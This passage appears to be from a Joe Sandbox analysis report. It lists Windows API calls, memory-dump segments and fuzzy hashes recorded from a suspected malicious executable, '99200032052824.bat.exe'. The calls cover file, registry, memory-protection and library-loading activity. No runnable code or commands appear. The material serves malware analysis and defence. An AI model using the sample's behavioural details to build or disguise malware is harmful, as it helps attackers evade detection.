                            • Opcode ID: 03acd6c05ef192acc4d5f2074103963a61a151cba363b2b3f7df3f6f04565d96
                            • Instruction ID: e287d0ceb598eb1b66b9bd8bf9e10b03538a68cca7d7f2c53772450b733fb655
                            • Opcode Fuzzy Hash: 03acd6c05ef192acc4d5f2074103963a61a151cba363b2b3f7df3f6f04565d96
                            • Instruction Fuzzy Hash: 0CE086767001119BCB24DBA4ED94CBE77A5D784320754053FD502F3290C674AD41CB68
                            APIs
                            • GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                              • Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                              • Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
                              • Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                            • String ID:
                            • API String ID: 2547128583-0
                            • Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                            • Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
                            • Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                            • Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD
                            APIs
                            • GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405B3D
                            • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: File$AttributesCreate
                            • String ID:
                            • API String ID: 415043291-0
                            • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                            • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                            • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                            • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                            APIs
                            • CreateDirectoryA.KERNELBASE(?,00000000,004031FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405610
                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CreateDirectoryErrorLast
                            • String ID:
                            • API String ID: 1375471231-0
                            • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                            • Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
                            • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                            • Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E
                            APIs
                            • CreateFileA.KERNELBASE(00000000), ref: 73A32AB7
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true
                            • Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 37ee40bf85b45a690a1566814c6d5342a90fd1e2c72d7be011eac0c01b141a20
                            • Instruction ID: f823ee27d1ddd0f100310dec586b3d438a6864b14413d4e992e5443db74a7cef
                            • Opcode Fuzzy Hash: 37ee40bf85b45a690a1566814c6d5342a90fd1e2c72d7be011eac0c01b141a20
                            • Instruction Fuzzy Hash: 9E417273A04318DFEB21EFA5DD83B993779EB0B314FA4842BE509C6368D63895428F50
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: wsprintf
                            • String ID:
                            • API String ID: 2111968516-0
                            • Opcode ID: f613bce74ee81a27b7f87de0acc03876fa924b4f50aff6f1e0ff4ca987a4ce67
                            • Instruction ID: bedd62cc0a07b3ea5aeeb9774d64ff1fcd63ced0a2701ac0ce4006b4a1ded65c
                            • Opcode Fuzzy Hash: f613bce74ee81a27b7f87de0acc03876fa924b4f50aff6f1e0ff4ca987a4ce67
                            • Instruction Fuzzy Hash: 33212970C04299BADF219BA89548BAEBF709F11304F0448BFE490B62D1C2BD8A81CF19
                            APIs
                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A6
                              • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: FilePointerwsprintf
                            • String ID:
                            • API String ID: 327478801-0
                            • Opcode ID: 6a14e0956b73ab4e90e394afd1f90f97da6441e28a52e0c2c4c4c0872888fc18
                            • Instruction ID: 442fb056f5e1893a743013a04d3c8a06be4ebfd32780c8d9df4a77f545abccc0
                            • Opcode Fuzzy Hash: 6a14e0956b73ab4e90e394afd1f90f97da6441e28a52e0c2c4c4c0872888fc18
                            • Instruction Fuzzy Hash: 1BE0EDB2B05116ABDB01BBD5AA49CBFA768DF50318F10403BF141F10D1CA7D49029B6D
                            APIs
                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: PrivateProfileStringWrite
                            • String ID:
                            • API String ID: 390214022-0
                            • Opcode ID: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                            • Instruction ID: fc3d639ee2ba9d49225374e904560d05d066977e3d8f4235cfc91afb5433c7ac
                            • Opcode Fuzzy Hash: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                            • Instruction Fuzzy Hash: 2FE012317005146BD72076B10FCE96F10989BC4308B284D3AF502761C6DDBD4D4245B9
                            APIs
                            • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E7D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                            • Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                            • Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74
                            APIs
                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BF4
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                            • Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
                            • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                            • Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8
                            APIs
                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                            • Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
                            • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                            • Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4
                            APIs
                            • VirtualProtect.KERNELBASE(73A3404C,00000004,00000040,73A3403C), ref: 73A328FF
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true
                            • Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 5a13793dd570a415f9f3b6bb33126bd45406a18a220e0f9e6326db3c96c44c5d
                            • Instruction ID: 3204070e878c3dc531019a8155fe98ed5d34eb938b27bd6268eff38315064496
                            • Opcode Fuzzy Hash: 5a13793dd570a415f9f3b6bb33126bd45406a18a220e0f9e6326db3c96c44c5d
                            • Instruction Fuzzy Hash: 83F07FB2B082A0DEC360EB6A8C877853BE0E31B355B61456AE59CD6285E33C41468F11
                            APIs
                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EB4,?,?,?,?,00000002,Call), ref: 00405E4A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Open
                            • String ID:
                            • API String ID: 71445658-0
                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                            • Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                            • Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58
                            APIs
                            • SendMessageA.USER32(00010420,00000000,00000000,00000000), ref: 0040409D
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                            • Instruction ID: b9763db4476a092513200920bafbf00b2c19ecde7e8b58ff16c676c9221c7c43
                            • Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                            • Instruction Fuzzy Hash: 32C04C717406006AEA208B51DD49F0677946750B01F1484397751F50D4C674E410DA1C
                            APIs
                            • SendMessageA.USER32(00000028,?,?,00403EA4), ref: 00404082
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                            • Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
                            • Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                            • Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18
                            APIs
                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                            APIs
                            • KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: CallbackDispatcherUser
                            • String ID:
